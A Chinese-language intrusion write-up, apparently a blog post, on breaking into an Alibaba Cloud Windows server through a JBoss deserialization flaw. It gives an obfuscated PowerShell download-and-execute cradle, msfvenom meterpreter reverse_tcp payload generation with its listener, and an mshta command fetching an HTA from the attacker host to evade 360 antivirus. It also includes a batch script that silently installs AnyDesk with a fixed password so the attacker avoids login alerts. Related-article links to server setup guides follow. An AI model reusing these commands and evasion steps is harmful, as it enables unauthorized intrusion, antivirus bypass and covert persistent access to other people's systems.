记一次从Jboss到3389远程桌面案例

简介: 记一次从Jboss到3389远程桌面案例

0x01 前言

国庆期间朋友@Sin给我发了个存在Jboss反序列化漏洞的入口点,想打内网,但在进程列表中看到有360主动防御和阿里云盾等进程,没能绕过360上线CS/MSF......。


0x02 漏洞验证

这里我们直接利用@STG-6哥的“Java反序列化终极测试工具”来验证这个漏洞,可以看到直接就是Administrator权限了,Tomcat/Weblogic/Jboss/WebSphere默认大多数都为高权限。

0x03 单机信息搜集

tasklist /svc命令将获取到的进程列表与本地杀软进程进行对比后发现存在:ZhuDongFangYu.exe、aliyundun.exe、aliyun_assist_service.exe等进程。

还看到有gpstool.exe某GPS定位工具、GServer.exe位置服务平台(GSevrer)两个进程,以及可用于提权的Ssms.exe进程,已经是高权限了,所以暂时用不上。

net localgroup administrators命令下还发现了一个前辈留下的隐藏后门账户erdj$,$demo不是哦!

netstat -ano命令下发现1433、3389是开着的,但由于这台主机为内网,而且存在360主动防御,所以暂时无法实现文件落地、执行添加/修改用户密码、端口转发等操作。

注:即使可以执行以上这些操作,在进行3389远程桌面连接时很有可能会触发阿里云主机的异地登录提醒,所以这里还得特别注意一下,不到万不得已不建议远程连接。


Exlive GPS车辆定位服务平台端口

翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件,存储着这个定位服务平台的相关配置信息,包括MSSQL数据库的用户和密码。


ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯。


0x04 绕过主动防御上线

测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。

    powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b)


    web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话,执行getsystem即可提升为SYSTEM,执行命令如下。

      1、生成载荷并编码
      msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin
      cat /tmp/shellcode.bin | base64 -w 0
      2、配置监听模块参数
      use exploit/multi/handler
      set payload windows/meterpreter/reverse_tcp
      set lhost 155.**.***.16
      set lport 443
      exploit
      3、目标主机执行载荷
      mshta http://155.**.***.16:8888/bypass360.hta

      注:mshta白名单貌似只能用x86的Payload,执行成功后会自动迁移至32位的rundll32.exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。


      0x05 绕过异地登录提醒

      虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。

      为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。


      注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。

        @echo off
        AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent
        echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence
        echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password
        choice /t 10 /d y /n >nul
        for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i
        echo Connection ID Is: %CID%

        接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。

        至此,全文结束,内网就不搞了!!!


        注意事项:

        在运行AnyDesk时得先使用rev2self命令恢复原始令牌,而且得在管理员在线且为激活状态下执行才能正常使用,如果管理员不在线或者为锁屏状态下执行时可能还需要验证系统密码。更多绕过方式可参考:3.3.8 腾讯云主机异地登录提醒绕过3.3.9 利用第三方绕过远程桌面连接

        相关文章
        |
        6月前
        |
        中间件 Java 应用服务中间件
        Windows部署web应用服务器Jboss中间件
        如何在Windows系统上部署JBoss 7.1作为Web应用服务器,包括配置环境变量、自动部署WAR包、访问JBoss控制台、设置管理员账户以及修改端口和绑定地址等操作。
        194 1
        |
        SQL Oracle Java
        Weblogic12C概述及安装
        Weblogic12C概述及安装
        987 0
        Weblogic12C概述及安装
        |
        应用服务中间件 Linux Shell
        远程linux服务器Tomcat中重新集成详解
        最近在做今日开讲项目的过程中,统一测试的时候,需要在linux服务器Tomcat中重新集成,对于菜鸟级别的我面对这些新东西不免有些手忙脚乱,不过经过一番努力终于重新集成成功,下面就将我的刻骨经历与读者分享O(∩_∩)O~
        |
        Windows
        windows远程服务器 上部署javaweb项目
        windows远程服务器 上部署javaweb项目
        269 0
        |
        Oracle Java 关系型数据库
        Weblogic搭建
        学习Weblogic搭建。
        323 0
        Weblogic搭建
        |
        XML Java Unix
        wildfly(JBoss AS)应用服务器快速入门
        wildfly(JBoss AS)应用服务器快速入门
        931 0
        wildfly(JBoss AS)应用服务器快速入门
        |
        XML SQL 开发框架
        weblogic教程:配置MyEclipse的WebLogic服务器
        weblogic教程:配置MyEclipse的WebLogic服务器 。 MyEclipse默认的应用服务器为JBoss3,这里我们使用WebLogic8.1。启动Eclipse,选择“窗口首选项”菜单,打开首选项对话框。展开MyEclipse下的Application Servers结点,点击JBoss 3,选中右面的Disable单选按钮,停用JBoss 3。然后点击WebLogic 8,选中右边的Enable单选按钮,启用WebLogic服务器。同时下面的配置
        247 0
        |
        Java Linux 应用服务中间件
        Linux安装weblogic服务
        Linux安装weblogic服务 一、环境准备: Linux系统 jdk-7u75-linux-x64.tar.gz(http://pan.baidu.com/s/1kTh5Vx1) wls1212_dev.zip(http://pan.baidu.com/s/1nttDkq1) 二、安装步骤: 1、首先创建weblogic用户、用户组并设置主目录 [root@localhost ~]# useradd -d /weblogic weblogic [root@localhost ~]# passwd weblogic 更改用户 weblogic 的密码。
        2854 0
        |
        应用服务中间件 数据安全/隐私保护 Java